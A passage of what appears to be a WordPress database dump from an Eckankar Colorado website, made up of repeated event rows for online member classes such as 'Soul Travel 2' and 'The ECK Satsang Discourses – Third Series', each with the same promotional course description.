/>\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – First Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-first-series-2021-10-03','','','2020-12-09 11:34:20','2020-12-09 18:34:20','',262857,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-03#038;p=262857',0,'tribe_events','',0),(262869,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2','','','2020-12-09 11:31:38','2020-12-09 18:31:38','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262869',0,'tribe_events','',0),(262871,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-01-03','','','2020-12-09 11:31:38','2020-12-09 18:31:38','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-03#038;p=262869',0,'tribe_events','',0),(262872,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-02-07','','','2020-12-09 11:31:38','2020-12-09 18:31:38','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-07#038;p=262869',0,'tribe_events','',0),(262873,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-03-07','','','2020-12-09 11:31:38','2020-12-09 18:31:38','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-07#038;p=262869',0,'tribe_events','',0),(262874,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-04-04','','','2020-12-09 11:31:38','2020-12-09 18:31:38','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-04#038;p=262869',0,'tribe_events','',0),(262875,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-05-02','','','2020-12-09 11:31:39','2020-12-09 18:31:39','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-02#038;p=262869',0,'tribe_events','',0),(262876,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-06-06','','','2020-12-09 11:31:39','2020-12-09 18:31:39','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-06#038;p=262869',0,'tribe_events','',0),(262877,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-07-04','','','2020-12-09 11:31:39','2020-12-09 18:31:39','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-04#038;p=262869',0,'tribe_events','',0),(262878,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-08-01','','','2020-12-09 11:31:39','2020-12-09 18:31:39','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-01#038;p=262869',0,'tribe_events','',0),(262879,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-09-05','','','2020-12-09 11:31:39','2020-12-09 18:31:39','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-05#038;p=262869',0,'tribe_events','',0),(262880,2,'2020-12-09 11:07:09','2020-12-09 18:07:09','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Soul Travel 2\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patte</span></p>','Online Member Class - Soul Travel 2','','publish','closed','closed','','online-member-class-soul-travel-2-2021-10-03','','','2020-12-09 11:31:39','2020-12-09 18:31:39','',262869,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-03#038;p=262869',0,'tribe_events','',0),(262881,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=262881',0,'tribe_events','',0),(262883,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-01-10','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-01-10#038;p=262881',0,'tribe_events','',0),(262884,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-02-14','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-14#038;p=262881',0,'tribe_events','',0),(262885,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-03-14','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-03-14#038;p=262881',0,'tribe_events','',0),(262886,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-04-11','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-11#038;p=262881',0,'tribe_events','',0),(262887,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-05-09','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-09#038;p=262881',0,'tribe_events','',0),(262888,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-06-13','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-13#038;p=262881',0,'tribe_events','',0),(262889,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-07-11','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-11#038;p=262881',0,'tribe_events','',0),(262890,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourses – Third Series\" – Member Class</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','Online Member Class - The ECK Satsang Discourses – Third Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourses-third-series-2021-08-08','','','2020-12-09 11:14:03','2020-12-09 18:14:03','',262881,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-08#038;p=262881',0,'tribe_events','',0),(262891,2,'2020-12-09 11:14:03','2020-12-09 18:14:03','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK 